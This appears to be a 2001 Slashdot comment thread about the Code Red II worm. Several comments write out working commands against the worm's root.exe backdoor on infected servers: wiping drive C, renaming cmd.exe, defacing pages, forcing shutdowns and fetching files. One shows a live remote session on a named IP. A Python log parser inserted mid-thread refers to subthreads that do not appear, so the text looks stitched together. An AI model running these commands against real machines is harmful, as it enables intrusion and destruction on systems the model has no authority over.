    5. Re:Experiment by p_trinli · · Score: 1

      When I plug in boxes on campus, the NICs always "blink like mad," even when the main system is off. It must be staying current with the network for some reason.

  147. Gnu/Sircam? by Tachys · · Score: 2, Interesting

    I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.

    If not, why not?

    1. Re:Gnu/Sircam? by LinuxHam · · Score: 1

      The tough part is getting a remote machine to execute code without knowledge of the machine owner. Cheesy email viruses are usually scripts embedded in documents and spreadsheets that automatically execute when the user opens the attachment. Hence the daily feeding of, "never open attachments you weren't expecting."

      The better email virii cause the end users' machines to execute code as soon as the email is received. That's a huge problem with Outlook. Think about the millions of office workers who never exit Outlook, even when going home for the weekend, and those with cable modems who leave Outlook up all day. Yes, you can make Outlook automatically dialup to retrieve email, but I doubt many people actually do that.

      AFAIK, no GNU mail readers support automatically executing scripts stored in email. Can anyone vouch for Netscape? One would think that would be closest risk to the same problems, but it would find so few users in the world.

      --
      Intelligent Life on Earth
    2. Re:Gnu/Sircam? by jorbettis · · Score: 2
      Similar to Sircam? Not presently.

      MIME attachments won't have the execute permission set, which means that a script would have to be saved to disk and executed by the user with the command

      $ bash virus.sh

      Or the user would have to set the execute permissions himself:

      $ chmod u+x virus.sh
      $ ./virus.sh

      Granted, a mail reader could be written to do all of this itself after the user ``clicks'' on the attachment, but I am aware of none that exist at the present time that have that ``feature''.

      Plus, since GNU/Linux (and all Unices) is a multi-user permissions based system, sircam would only be able to touch those files to which the user has read access. As long as the administrator isn't reading his mail as root, you'll never have to worry about some luser mailing his /etc/shadow to you.

      So, until Microsoft writes a port of Outlook and starts certifying ``Linux Engineers'', no, there won't be a sircam for GNU/Linux.

      --

      Jordan Bettis

      ``Wherever you go, there's another stupid sigfile quote.''
    3. Re:Gnu/Sircam? by Glytch · · Score: 2

      I don't doubt it. Frankly, it's hard to imagine a feature that Emacs doesn't have and/or hasn't had. :)

    4. Re:Gnu/Sircam? by Goonie · · Score: 2
      IIRC, Emacs *did* have a problem allowing mail to contain arbitrary bits of elisp code which were auto-executed by emacs, but they took out this feature a long time ago.

      Anybody got more details?

      --

      Any sufficiently advanced technology is indistinguishable from a rigged demo
      --Andy Finkel (J. Klass?)
  148. CmdrTaco runs Windows by �nubis · · Score: 3, Funny

    I still think sircam is more annoying since it affects every email user

    Every email user?!? CmdrTaco must run Windows. Let's get him!

    1. Re:CmdrTaco runs Windows by M.+Silver · · Score: 2
      Every email user?!? CmdrTaco must run Windows. Let's get him!

      I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)

      --

      Slashdot's token middle-aged housewife
    2. Re:CmdrTaco runs Windows by kilrogg · · Score: 1
      I think what he meant was the even non-windows people still receive annoying sircam email from windoze user (though I haven't).

      His statement is slightly wrong, since even non-IIS using people still get infection attempts from IIS servers. My access_log from yesterday now stands at 300K, so Taco's wrong, CR does affect me too, in a way.

    3. Re:CmdrTaco runs Windows by whatnotever · · Score: 1

      Um, I think he meant that it sends massive files to random people, regardless of their OS. Thus, Joe Linux gets as much crap in his box as Jim Windoze.

  149. Script kiddie by SnapperHead · · Score: 1

    This script kiddie won't stop until he gets all over the news about the damage it caused.

    Another 13 year old looking for attention.

    --
    until (succeed) try { again(); }
  150. My prediction... by logicfuzzy · · Score: 1

    First came NNNNNNN then XXXXX... Hmmmmm. I predict two more versions : IIIIIII and UUUUUUU.. It's a word scramble game!

  151. I'm sorely tempted . . . by Floyd+Turbo · · Score: 5, Insightful

    Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.

    The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.

    Hmm . . .

    1. Re:I'm sorely tempted . . . by Greyfox · · Score: 5, Insightful

      You want this: http://support.microsoft.com/support/kb/articles/Q202/0/13.ASP Happy little command called IISRESET. I think an IISRESET /STOP is in order...

      --

      I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

    2. Re:I'm sorely tempted . . . by nugatory · · Score: 1
      The more I think about it, the more it seems like a permissible act of self defense.

      I sympathize a lot with the soreness of your temptation, but I also think you misspelled "less" somewhere in the quoted sentence :-)
      Self-defense only applies when you are defending yourself and have no alternative. If a crazed axe murderer is pounding at your door with the avowed intent of hacking you into bloody bits, it's self-defense if you shoot him when he bursts through the door. It's self-defense if you shoot him after it's obvious that he will succeed in breaking down the door. But you are not allowed to shoot him if your door is protecting you - that's what the door and the 911 dispatcher are there for.

      You wouldn't be posting here if you actually had any measurable vulnerability to CRII, so there's no question of self-defense. You're already defended. Both legally and ethically the right thing to do is to notify the owner of the offending machine, or their ISP (who does have the right to shut off their internet access) and let them deal with it.

      But I still feel the temptation....

    3. Re:I'm sorely tempted . . . by Floyd+Turbo · · Score: 3, Insightful

      C'mon now, I'm not talking about killing the guy, or even his box. I'm not talking about wiping his harddrive or even installing a fix without the owner's permission. I just want these damned things to stop eating up my bandwidth.

      And while I'm not going to get cracked by the worm myself, I am getting hammered by others in the same /8 as me who weren't immune. I'm also not thrilled about thinking what the author of this new version is going to do with all the boxes he's rooted.

      Given all that, I'm still having a hard time deciding that telling the offending machine to turn itself off isn't a valid, proportionate response to this sort of thing.

      OK, OK, I'm not going to do it, but man . . .

    4. Re:I'm sorely tempted . . . by Anonymous Coward · · Score: 1, Insightful

      Suppose that server is monitoring or controlling some mission-critical or safety-critical apparatus? It might be a server so that it can be monitored from a remote location. You might kill someone by shutting it down or rebooting it.

    5. Re:I'm sorely tempted . . . by Ropati · · Score: 1

      I haven't worked through all the ramifications but Windows 2000 does respond to "shutdown now". I ran it from a prompt and it started a 30 second timer to a software shutdown. Yeah. Good luck.

      --
      machinator omnis sine licentia
    6. Re:I'm sorely tempted . . . by blakestah · · Score: 2

      That machine has been remote rooted, and anyone who has an httpd log is receiving it on a news broadcast. If it is running mission critical software, anyone and their brother can do anything they want to the mission critical software.

      The best thing you could do for that machine is shut it down. Its defenses have been COMPLETELY compromised. Without any defenses, the machine is useless.

      Besides, only a total idiot would run mission critical software on an unpatched IIS server, particularly after the past few weeks.

    7. Re:I'm sorely tempted . . . by Eric+S.+Smith · · Score: 2, Insightful
      Both legally and ethically the right thing to do is to notify the owner of the offending machine

      ...assuming that you can determine who that person is. And, ethically, if you were walking down the street with a fire extinguisher and saw somebody's garbage can on fire, would you really, uhh, leave them a message on their answering machine?

      The fire extinguisher in this case is ipconfig /release, I think. Bonus marks for picking the right interface on a machine with more than one NIC.

    8. Re:I'm sorely tempted . . . by SCHecklerX · · Score: 2

      Well then they damned well BETTER shut it down, b/c in the state it is in, it is CERTAINLY a larger threat to that person's life, being able to be fucked with!

    9. Re:I'm sorely tempted . . . by IdentityCrisis · · Score: 1

      Welp, You can
      rundll32.exe shell32.dll,SHExitWindowsEx X
      where X stands for:
      0 = logoff
      1 = shutdown
      2 = reboot
      4 = force
      and you can also combine
      meaning a forced shutdown is 5 (4+1)

    10. Re:I'm sorely tempted . . . by gdchinacat · · Score: 1

      does anyone know if CodeRed spawns off other threads that would stay alive when iis is stopped? if so, doing this would help with very little, apart from possibly alerting the admin (assuming there is one) that the website is down. The response most likely with be the typical windows reboot.

    11. Re:I'm sorely tempted . . . by gmhowell · · Score: 2

      There is a binary called "shutdown.exe". Not sure if it came with a service pack or option pack, or from a stock install. It's actually not that bad.

      The neat trick is that you can shutdown remote boxes. I think you do need admin privileges, though.

      Since you are going to do this to Code Red boxen, they already have the telnet server, and you should easily be able to put the binary on that server.

      BTW, you can also send a message. For example, to tell the admin why this is happening:

      shutdown.exe "Your server is being shutdown now. You have been infected with Code Red [1,2,3], and it is pissing me off. Next time, please try to keep track of patches and upgrades. BTW, this (should | should not) clear up your problem. No need to thank me. Moron."

      Add the /r switch if you want the machine to reboot. Add /t:x where x=number of seconds until shutdown (default is 20). Enter other machines on the network (Windows machines) as \\machinename.

      --
      Jesus was all right but his disciples were thick and ordinary. -John Lennon
    12. Re:I'm sorely tempted . . . by spongman · · Score: 2

      iisreset /stop kills the IIS process, which would stop any threads that are running within it (including those CR2 threads).

    13. Re:I'm sorely tempted . . . by kryptkpr · · Score: 1

      Codered II -does- write itself to disk. If you reboot the box, it maps c: to /c and d: to /d, thus you're causing a lot more damage by shutting it down (and in turn causing it to be eventually restarted, by the same idiot who's left it up this long).

      --
      DJ kRYPT's Free MP3s!
    14. Re:I'm sorely tempted . . . by kris0r · · Score: 1
      My more benign method of dealing with this problem -- I send the following request to everyone sending me Code Red garbage:

      GET /scripts/root.exe?/c+explorer+http://www.cert.org/advisories/CA-2001-23.html HTTP/1.0\r\n\r\n

      Simple enough -- it launches an IE window with the CERT advisory in it. If that isn't enough to get the admin's attention, not much else is.

    15. Re:I'm sorely tempted . . . by e_n_d_o · · Score: 2

      I could not get this to work on my own NT4 machine, its on sp6a. Any ideas/corrections?

      Thanks

  152. The problem with fixing IIS servers automatically by Velox_SwiftFox · · Score: 2
    Is that Microsoft's patch only works if you have service packs installed (Read: rebooting the machine at the least).

    Because those who are most vulnerable to the wormvirus are the companies with the most clueless sysadmins, the set of machines with uninstalled service packs (and running Index Server by out-of-the-box default, the vulnerable component) probably largely overlaps the set of Code Red machines.

    Yes, having to administer one of these along with Solaris and Linux boxen, I've patched mine; trivial.

  153. A prediction by nugatory · · Score: 2
    http:// {infected ip here } /scripts/root.exe?/c%20del%20/Q%20/F%20/S%20c:\*.*

    It's not as if many /.ers need to be told about the existence of the DEL command, and the intellectual leap required to recognize that the ability to execute an arbitrary command implies the ability to execute a particular command seems rather modest to me.

    But before we mod this down as an insult to the intelligence of the /. readership, there is a more interesting issue: This particular inspiration is going to occur to a fair number of vandals, kiddies, and assorted undersocialized individuals. Many of them will do something more destructive with it than posting it to slashdot. More generally, the level of sophistication needed to attack a CRII-compromised machine is low, much lower than even script-kiddie level, low enough that any moderately determined wolfcub with a bent hairpin and a telnet client can do tremendous damage.

    Thus, CRII has suddenly created and widely advertised a pool of very vulnerable machines. It would not be surprising to find that the worst damage is done by vandals following along behind CRII, just as looters follow behind natural disasters.

  154. Ummm, no actuall by kfg · · Score: 4, Funny

    If you take the water away completely and hold the frog over the heat source itself it will roast.

    Sorry, I'm "in a mood" today and I couldn't help myself.

    Still, it's interesting. If you put the frog in cold water and slowly turn up the heat what it will do, being cold blooded, is go to sleep long before it dies and *poaches.*

    What is the relevance and why should anyone care? Lobster.

    The correct way to cook a lobster, not matter what *anyone* tells you, is to put it in cold water and bring the heat up. The lobster relaxes and goes to sleep before it cooks.

    If you just dump it in hot water it goes " Eeeeeeeeeeee," tightens up all of its muscles and pumps lactic acid throughout its system before it dies.

    Starting in cold water is both more humane and results in quite noticeably tastier lobster.

    KFG

    1. Re:Ummm, no actuall by waveman · · Score: 2, Insightful

      Even more relaxed lobsters and nicer food if you float the lobsters in wine until they become unconscious. We did this once and the results were excellent

  155. If you're a nice guy by CTho9305 · · Score: 1

    http://infected_machine/scripts/root.exe?/c+ren+cmd.exe+worm.exe I've been told trying to delete cmd.exe gives access denied - maybe it's attrib +r+s or something. This one works for sure

  156. OK so far 74 this half hour!! by windowsLuser · · Score: 1

    Someone on the 24.x.x.x domain (@home) is infected bad with this thing. I'm not even running a server. I'm just surfing today, Zone alarm is going crazy reporting attacks to different ports. What gives? I thought this was a port 80 thing?

    --
    This is a Sig, there are many like it but this one is mine! I wish I had more than 120 chars... whats a char?
    1. Re:OK so far 74 this half hour!! by LinuxHam · · Score: 1

      Zone alarm is going crazy reporting attacks to different ports. What gives I thought this was a port 80 thing?

      I was wondering the same thing when looking at my snort firewall logs.. I figured it out when I decided to pull up a web page off of one of the IP's "attacking" on a high port -- Slashdot came up!

      Your firewall is only looking for the signature of the attack to come across the wire. Yours, like mine, is not differentiating between which port the payload is destined for on your machine. It sees the attack sequence come in on a web page, and it's been posted plenty of times, and your firewall points it out. Can any snort gurus tell us what to change to make it only look for the payload coming in on port 80?

      --
      Intelligent Life on Earth
  157. Best Downloadz Ever by dozing · · Score: 1

    According to some of the posts I've been seeing a lot of the infected machines are on cable-modem users. Due to the nature of this new beast we have access to all these infected servers. Cable-modem users due to their high bandwidth tend to have some of the best downloadz. It sounds to me like this is just Napster Version 2.

    --
    Dozings.com -- Its kinda funny... If you're as crazy as me.
  158. How to get a list of all infected hosts by braddock · · Score: 2, Interesting
    So I have this log of about 100 CR2 hosts who have attacked my web server, and each of those infected hosts have probably got records of 100 other hosts that have tried to reinfect them in their logs. If I snarf all their logs, I'll have 10,000 compromised hosts that I've got root access on. Do it one more level, and I've got every compromised machine on the internet. How long until some kiddie scripts that up?

    OR, one group could patch all those infected hosts...or at least notify the admins.

    I've got a full analysis of this at http://braddock.com/cr2.html

    1. Re:How to get a list of all infected hosts by p_trinli · · Score: 1

      Every host had seven posts. Every post has seven flames. Every flame had seven lines. Hosts, posts, flames, lines, how many trolling on Slashdot?

  159. Maybe not that new. by Evro · · Score: 1

    This happened to me on 7/23/01, so I don't know how new it really is. Now time to format that damn win2k box :-(

    --
    rooooar
  160. Maybe we have the *responsibility* by pdcull · · Score: 1

    ...to shut down these systems now?

    Think about it, folks - I'm no script kiddie, but using information posted on /. under this article, I grabbed the URL of an infected system and using my Internet Explorer (on Win95 no less) was able to do a DIR C:\ on aforementioned system (following the instructions in a posting here on /.).

    Surely that means that Slashdot is contributing to the problem by making all the necessary information available where any script kiddie can find it.

    Now that we've made that information available, surely we have a responsibility to at the least remotely shut down the systems so that they aren't at further risk until the owners see them tomorrow morning?

    Now of course, that may be still considered 'hacking' so is there a suitable government or non-government organization which could legally do this?

  161. In other news... by wrinkledshirt · · Score: 2, Funny

    ...timothy and cmdr Taco both showed up to work today wearing matching golf shirts and Dockers pants. Upon further inspection, it was determined that they also had the exact same type of socks, shoes, and belts (they stopped short of comparing underoos). At some point, Hemos was quoted as saying, "You know, I think you two should talk to each other before coming in to work."

    --

    --------
    Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...

    1. Re:In other news... by p_trinli · · Score: 1

      Honestly, how hard is it to check the past X posts before posting a story? Yeesh. Just imagine if real journalists did this.

    2. Re:In other news... by p_trinli · · Score: 1

      No, it's called carelessness.

  162. Foster parents for software by TheMightyZog · · Score: 1

    What really needs to be done is setup a software protective services agency, similar to child protective services. If the parent (company) is caught abusing (repeated instances of lack of security, total lack of concern for the end users of the software, etc) the child, the child (software with source code) is taken from them and placed with foster parents (another company) that have the child's (software's) best interests in mind.

    I see the first children being Outlook and IIS.

  163. Your Mission, Should you Decide to Accept it... by Greyfox · · Score: 2
    Set Apache up so when it sees a code red probe (get default.ida blah blah blah) telnets to that machine's port 80 and shuts down the web server.

    Extra credit: Disinfect the machine with the security patch from the MS Web Site.

    As this would be completely passive (Rather than patching the code red code) it should be slightly less dangerous than releasing a new worm to the net. And since it would affect only machines that have already been compromised, it should be slightly less ethically questionable than patching the worm code to do something new and the releasing it. I'm sure I'll get flamed for suggesting it nonetheless...

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  164. Aural Feedback by Aldurn · · Score: 3, Interesting

    I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:

    #!/usr/bin/perl
    # Poll the Apache access log once a second and count the Code Red probe
    # lines (the XXXX filler in the default.ida request). attacks_a holds the
    # count from the previous poll; when it changes, play a sound.
    use strict;
    use warnings;

    while (1) {
        system("grep XXXXXXXXXXXXX /var/log/your-access.log | cut -d ' ' -f 1 | wc -l > attacks_b");
        my $returnval = system("diff attacks_a attacks_b > /dev/null");
        if ($returnval != 0) {    # count changed (or attacks_a does not exist yet)
            system("cp -f attacks_b attacks_a");
            system("play buzzer2.aiff &");
        }
        sleep(1);
    }

    --
    char sig[120] = "\0"
    1. Re:Aural Feedback by chrome · · Score: 1
      Yup, that works really well. And, if you replace the line

      system("play buzzer2.aiff &");

      With

      system("cat /usr/dt/appconfig/sounds/C/rooster.au > /dev/audio &");

      It will even work on solaris. Quite scary how many roosters I have behind my sofa! :)
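The awk one-liners in the "Securityfocus asks for IPs" subthread and the polling script in "Aural Feedback" both scrape the same thing out of an Apache access log. As an added example (not code from any poster in this thread), here is that scraping in Python: it classifies each default.ida probe by its filler (NNNN for the original worm, XXXX for Code Red II), collapses hits per source IP so the "sort | uniq" question answers itself, emits the "<ip> <date> <time>" lines the aris-report robot wants, and counts hits per hour. The log lines are constructed and the file path is an assumption.

```python
import re
from datetime import datetime

# Constructed Apache common-log lines (not a real log); the last line is deliberately junk.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Aug/2001:13:42:17 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 276
192.0.2.77 - - [06/Aug/2001:13:42:19 -0600] "GET /index.html HTTP/1.0" 200 1532
10.0.0.5 - - [06/Aug/2001:13:44:02 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 276
198.51.100.9 - - [06/Aug/2001:14:01:40 -0600] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 276
not a log line at all
"""

# Fields of the Apache common log format: client, ident, user, [timestamp], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
APACHE_TS = "%d/%b/%Y:%H:%M:%S %z"   # e.g. 06/Aug/2001:13:42:17 -0600


def classify(request_line):
    """Return the worm variant a request line looks like, or None for normal traffic.

    Both generations probe /default.ida; the filler after the '?' tells them apart
    (NNNN... for the July worm, XXXX... for Code Red II)."""
    if "/default.ida?" not in request_line:
        return None
    query = request_line.split("/default.ida?", 1)[1]
    if query.startswith("XXXX"):
        return "CodeRedII"
    if query.startswith("NNNN"):
        return "CodeRed"
    return "unknown-ida-probe"


def parse_probes(lines):
    """Yield (ip, timestamp, variant) for every Code Red probe in an Apache log."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:                      # malformed line: skip rather than crash
            continue
        variant = classify(m.group("req"))
        if variant is None:
            continue
        ts = datetime.strptime(m.group("ts"), APACHE_TS)
        yield m.group("ip"), ts, variant


def summarize(lines):
    """Collapse probes per source IP: first/last seen, hit count, variants seen.

    This is the dedup the 'sort | uniq' subthread was after: every log line has a
    different timestamp, so uniq on the raw awk output removes nothing."""
    hosts = {}
    for ip, ts, variant in parse_probes(lines):
        entry = hosts.setdefault(ip, {"first": ts, "last": ts, "count": 0, "variants": set()})
        entry["first"] = min(entry["first"], ts)
        entry["last"] = max(entry["last"], ts)
        entry["count"] += 1
        entry["variants"].add(variant)
    return hosts


def aris_report_lines(lines):
    """One '<ip> <date:time> <tz>' line per attacking host (its first sighting),
    the same shape the awk '{print $1 " " $4 " " $5}' one-liner produces."""
    return [f"{ip} {e['first'].strftime(APACHE_TS)}" for ip, e in summarize(lines).items()]


def hourly_counts(lines):
    """Probe count per local hour, the kind of peak-time view the stats posts describe."""
    counts = {}
    for _ip, ts, _variant in parse_probes(lines):
        counts[ts.hour] = counts.get(ts.hour, 0) + 1
    return counts


if __name__ == "__main__":
    # Assumed path; replace with your own access log.
    try:
        with open("/var/log/apache/access.log") as fh:
            lines = fh.read().splitlines()
    except OSError:
        lines = SAMPLE_LOG.splitlines()
    for line in aris_report_lines(lines):
        print(line)
    for hour, n in sorted(hourly_counts(lines).items()):
        print(f"{hour:02d}:00  {n} probes")
```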
  165. A Warning to Whitehats by Ms.Taken · · Score: 5, Informative
    Anyone working on scripts which respond to Code Red attacks by patching the originating server should read this cnet article, which calls that approach 'hack-back'.

    From the article:

    The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."

    It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.

    1. Re:A Warning to Whitehats by MagicM · · Score: 1

      From that article:

      "Instead of fixing buggy software, the focus should be on locking down computer systems to prevent activity that could be compromising, said Randy Sandone, CEO of security software maker Argus Systems Group."

      Ok so there's a company I'll never trust software from again...

    2. Re:A Warning to Whitehats by Glytch · · Score: 2

      I don't know what Mr. Sandone considers "locking down computer systems to prevent activity that could be compromising", but shouldn't that include fixing buggy software?

  166. Re:Someone needs to write by siokaos · · Score: 1

    Someone needs to write code into SlashCode that will remove redundant comments. Someone posted this idea just yesterday.

    "someone needs to"... comments suck, the way I see them is "Someone needs to learn a programming language" i.e. the poster!

    --
    http://siokaos.org/
  167. Let me get this straight by blakestah · · Score: 2

    Let me make sure I understand this one.

    I grep \?XXX from /var/log/apache/access.log

    grep \?XXX /var/log/apache/access.log | mawk '{print($1) }'

    Then, for each result, I can telnet to port 80 and remote root the machine with a single get request for scripts/cmd.exe ??

    I have 45 such hits in my log files, mostly from machines at my ISP. That is truly ridiculous.

  168. SirCam Got Some Press!!! by E-Rock-23 · · Score: 1

    It was just a tiny mention, and it was in a little hickville newspaper, but SirCam finally got some print attention. Of course, it was in a Code Red article, which was careful to let the sticks dwellers know that as long as they didn't use NT or 2000 (why would they?) they were safe. I myself received SirCam, but since my e-mail client doesn't use scripts, I was safe. Now, if the mainstream net media could only see that we, the wee users, are in more trouble than the big bad companies...

    --
    Blog Prophyts - Right On, Man
  169. Now that I've got access to hundreds of boxes by rjamestaylor · · Score: 2
    how can I alert these losers to the problem?

    Here's where I got:

    [root@yy-yy-yy-y-yy user]# telnet xx.x.xx.xxx 80
    Trying xx.x.xx.xxx...
    Connected to xxx-xx-x-xx-xxx.co.sprintbbd.net (xx.x.xx.xxx).
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 21:42:59 GMT
    Content-Type: application/octet-stream
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    c:\inetpub\scripts>
    Suggestions? (Non-destructive, please, the goal is to alert not hurt)
    --
    -- @rjamestaylor on Ello
    1. Re:Now that I've got access to hundreds of boxes by E-Rock-23 · · Score: 1

      Can you get to their HTML? Replace their main page with one that says something like "This server is poorly secured and has been infected with CodeRedII. Please e-mail the administrator and tell them to remedy this solution." And save a copy of the original index file so they can go right back to using it. Just a thought.

      --
      Blog Prophyts - Right On, Man
    2. Re:Now that I've got access to hundreds of boxes by Anonymous Coward · · Score: 2, Funny
      White hat way:
      GET /scripts/root.exe?\c start [helpful info site]
      GET /scripts/root.exe?\c net send 127.0.0.1 You have Code Red! Patch your webserver, dammit!

      Black hat way:
      GET /scripts/root.exe?\c start http://goatse.cx/
      GET /scripts/root.exe?\c net send 127.0.0.1 j00 h4v3 b33n 0wn3d by [your name here]! u sux0r! 1 r0x0r!
      GET /scripts/root.exe?\c echo h4x0r3d by [your name here] > ..\index.html

      Weirding Way:
      GET /scripts/root.exe?\c start [Dune website]
      GET /scripts/root.exe?\c net send 127.0.0.1 We've got wormsign!

  170. White Hat Viruses? by VValdo · · Score: 2

    With all those destructive virus-writers groups and everything, you'd think by now there'd be an Illuminati-type secret organization of white hat programmers somewhere out there that cripple viruses and release a "serum" strain to inoculate systems and close MS's holes.

    It would be illegal of course, but, well, Robin Hood broke the law too.

    (I'm not advocating this of course, just thinking it's curious no such organization exists)
    W

    --
    -------------------
    This is my SIG. There are many like it, but this one is mine.
    1. Re:White Hat Viruses? by Thurn+und+Taxis · · Score: 1

      If the organization is secret, how do you know it doesn't exist? The only logical answer is that you're a member of this secret, supposedly non-existent organization, and you're trying to keep us in the dark! So there!

      --
      On stereophonic equipment, the monaural sound obtained through multiple channels will enhance your listening pleasure.
    2. Re:White Hat Viruses? by Thurn+und+Taxis · · Score: 1

      As an aside, adding my .sig to the top of any web page (without the tags) should annoy most people running virus checkers.

      --
      On stereophonic equipment, the monaural sound obtained through multiple channels will enhance your listening pleasure.
    3. Re:White Hat Viruses? by Thurn+und+Taxis · · Score: 1

      Okay, I guess /. filters .sigs. Go to this page to see the code that virus checkers object to.

      --
      On stereophonic equipment, the monaural sound obtained through multiple channels will enhance your listening pleasure.
  171. Apache users Create default.ida 5mb!!!! by darkharlequin · · Score: 1

    Slow them down!!!!!!

    --
    i am so very tired....
    1. Re:Apache users Create default.ida 5mb!!!! by Just+Jeff · · Score: 1

      No, but you can make /default.ida a CGI script which just sleeeeeeeeeeeeeps. Of course, that ties up your network resources too...

    2. Re:Apache users Create default.ida 5mb!!!! by Anonymous Coward · · Score: 3, Interesting

      Or you could set up default.ida as a perl script that telnets to the IP's port 25 and sends an email with the fact that they have a box that's screwed.. like the guy did here.

  172. I have a funnier story by sxpert · · Score: 1

    It's even better for me, my own ISP (noos.net) has machines that are currently attacking me... see the log below :

    212.198.0.93 - - [05/Aug/2001:08:59:41 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 283 "-" "-"
    guess what... this is "curie.noos.net", part of my ISP's systems

  173. Re:Someone needs to write by nyet · · Score: 2


    GET /scripts/bash.exe?-c%20"/c/inetpub/scripts/wget.ex e%20http://mssjus.www.conxion.com/download/winntsp /patch/q300972/nt4/en-us/q300972i.exe"


    tried that. Unfortunately, you need cygwin wget. Is there an explorer.exe equivalent to wget?

  174. Correction by Ms.Taken · · Score: 1

    Sorry that link should have been to the FAQ referenced in the article. The FAQ's old (July 31), but the basics still apply.

  175. Re: How to be a nicer guy by Anonymous Coward · · Score: 1, Informative

    http://IP.IP.IP.IP/scripts/root.exe?+/c+start+%20h ttp://www.digitalisland.com/codered/

    Find & run websnarf.pl or grab the IP's off your web logs, run this on the IP of whoever attacks with v2 (XXXXXXXXXXXXXXXXXX) and you're set. It's easier, I think, since it gives them more info (starts their browser & points them to info on CR, though I wish it had more info on how to remove the *trojan* which will not disappear with the patch :/ since it also creates the /c and /d aliases to *keep* them infected...)

    I do wish we could autopatch these, but this is the next best thing, since it's not harmful (unlike the format c: ideas some are having... *sigh* ...)

    If someone comes up with an autopatch script which grabs the logs from websnarf, then telnets in & fixes them up, I'm open to ideas here...

  176. I cant believe... by nick-less · · Score: 1
    Trying 212.143.77.136...
    Connected to 212.143.77.136.
    Escape character is '^]'.
    GET /scripts/root.exe?/c+dir+c:\
    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 23:04:17 GMT
    Content-Type: application/octet-stream
    Volume in drive C has no label.
    Volume Serial Number is 10D1-32F6

    Directory of c:\

    08/05/2001 11:06p 289 default.asp
    08/05/2001 11:06p 289 default.htm
    08/05/2001 07:17p Documents and Settings
    08/05/2001 11:06p 289 index.asp
    08/05/2001 11:06p 289 index.htm
    08/05/2001 11:06p Inetpub
    08/05/2001 06:54p Program Files
    08/05/2001 07:29p WINNT
    4 File(s) 1,156 bytes
    4 Dir(s) 4,975,837,184 bytes free
    Connection closed by foreign host.
    Did anyone else notice the date? This Server is a fresh installation and already infected again... These guys must be punished....
  177. Now I can try and /. myself :-) by GC · · Score: 2

    I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.

    You can find the results and a link to the script here

  178. Damnit, it wouldn't bite....only 8k dl'd by get by darkharlequin · · Score: 1

    this sucks... I wanted to tie the servers up, but actually, now that I think of it, this will flood the network more...oops....

    --
    i am so very tired....
  179. I am not a robot by ryanr · · Score: 2

    Though I feel like one about now... long night. :)

    Those are going to a shared e-mail alias. I get copies of everything, as well as a few other people. Unfortunately, because they are coming in many format types, we have to compile them by hand. But absolutely, please do send us the logs and have them in the format requested.

  180. Would someone please inform the media! by braddock · · Score: 1

    Sheesh, I keep waiting for cnn, abc, cbs, bbc, SOMEONE to report that the internet's security has just been turned to swiss cheese, but all of them are still headlining stories that their technology editor wrote before going home for the weekend about how "The Red Tide recedes", and "Code Red virus not so bad...kinda soft and cuddly".

    Visions of thousands of password packet sniffers kicking in Monday morning on CR2 backdoored systems dance in my head....

    1. Re:Would someone please inform the media! by sonnik · · Score: 1

      You know, I was also thinking that this would be a good thing to inform the media of.

      I don't like the incoming requests to my @Home service (inhibits performance and lessens my ability to detect legitimate attacks).

      I am overwhelmed by the total number of idiots who are still running insecure IIS on their always on cable modems.

      What's the consensus? Call the media or no?

    2. Re:Would someone please inform the media! by sonnik · · Score: 1

      At least the AP has an article,

      http://dailynews.yahoo.com/h/ap/20010805/tc/code_red_1.html

  181. Help! Need to chop my file with sed? by BawbBitchen · · Score: 1

    So I figured this out....maybe they will see it? echo GET /scripts/root.exe?/c+copy+c:\winnt\clock.avi+c:\yo uhavecodered.txt | telnet %1 80 Seems like a good idea. So, anyone help me get the IPs out of my access_log so I can feed 'em to the script. I am not too good with sed, so.. Some command to grep the access_log for the .ida and then get the IP and put it in a text file? grep -E \.ida /var/www/log/access_log Then???

